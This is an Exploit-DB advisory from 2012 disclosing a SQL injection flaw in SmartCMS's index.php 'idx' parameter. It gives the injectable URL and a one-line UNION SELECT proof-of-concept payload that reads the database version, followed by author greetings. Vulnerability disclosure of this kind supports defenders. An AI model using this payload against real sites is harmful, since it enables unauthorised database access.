SmartCMS index.php idx parameter SQL Injection Vulnerability

2012-11-26T00:00:00
ID EDB-ID:22936
Type exploitdb
Reporter NoGe
Modified 2012-11-26T00:00:00

Description

SmartCMS (index.php idx parameter) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            =============================================================================================================
  
  [o] SmartCMS <= SQL Injection Vulnerability
   
       Software : SmartMS
       Vendor   : http://smartcms.nl/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
 
=============================================================================================================
 
  [o] Exploit
 
       http://localhost/[path]/index.php?idx=[SQLi]
 
 
  [o] PoC
 
       http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--
 
=============================================================================================================
 
  [o] Greetz
 
       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{
 
=============================================================================================================
 
  [o] November 26 2012 - Papua, Indonesia